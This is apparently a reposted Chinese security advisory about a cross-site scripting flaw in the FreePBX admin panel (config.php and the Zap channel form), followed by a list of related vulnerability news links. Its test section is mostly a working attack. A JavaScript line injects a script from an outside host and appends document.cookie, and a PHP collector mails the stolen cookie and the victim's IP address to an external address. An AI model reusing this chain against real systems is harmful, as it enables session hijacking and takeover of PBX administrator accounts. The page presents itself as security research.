链接:http://secunia.com/advisories/37972/ http://www.exploit-db.com/exploits/10645 *>测试方法: --------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!location.href="https://www.example.com/admin/admin/config.php?display=trunks&tech=%3C/script%3E%20%22%3E %3Cscript%20src%3Dhttp%3A//global-evolution.info/etc/grep.php%3E%3C/script%3E?nice="+escape(document.cookie)<? $cookie = $_GET["nice"]; $ip = getenv("REMOTE_ADDR"); $Time = date("l dS of F Y h:i:s A"); $msg = "Cookie: $cookie
IP Address: $ipTime: $Time"; $subject = "cookie"; mail("notification@global-evolution.info", $subject, $msg); header ("location: http://127.0.0.1:8080/admin/"); ?> <form name="editZapchandid" action="" method="post" onsubmit="return checkZapchandid(editZapchandid);"> <input type="hidden" name="extdisplay" value=""> <input type="hidden" name="channel" value=""> <input type="hidden" name="action" value="add"> <table><tr><td colspan="2"><h5>Add Channel<hr></h5></td></tr> <tr><td><a href="#" class="info">Channel:<span>The Zap Channel number to map to a DID</span></a></td> <td><input size="5" type="text" name="channel" value="" tabindex="1"></td> </tr><tr><td><a href="#" class="info">Description:<span>A useful description describing this channel</span></a></td> <td><input size="40" type="text" name="description" value="INSERT 0WN SCRIPTCODE HERE!!!" tabindex="2"></td> </tr><tr><td><a href="#" class="info">DID:<span>The DID that this channel represents. The incoming call on this channel will be treated as if it came in with this DID and can be managed with Inbound Routing on DIDs</span></a></td> <td><input size="40" type="text" name="did" value="" tabindex="3"/></td> </tr><tr><td colspan="2"><br><input name="Submit" type="submit" value="Submit Changes" tabindex="4"> </td></tr></table></form>建议: -------------------------------------------------------------------------------- 厂商补丁:FreePBX ------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://freepbx.org/tracDeluxeBB多个远程安全漏洞奥巴马任命网络安全专家担任“网络沙皇”相关资讯 漏洞
快递官网漏洞泄露 1400 万用户信息 (08/12/2014 08:37:42)
要389目录服务器访问绕过漏洞 (10/01/2012 09:18:08)
ASUS Net4Switch "ipswcom.dll" (03/02/2012 09:32:42)
软件漏洞是一笔大买卖! (10/06/2012 08:28:32)
PHPCMS V9.1.13任意文件包含漏洞分 (08/01/2012 07:23:17)
Open Handset Alliance Android (03/01/2012 06:59:34)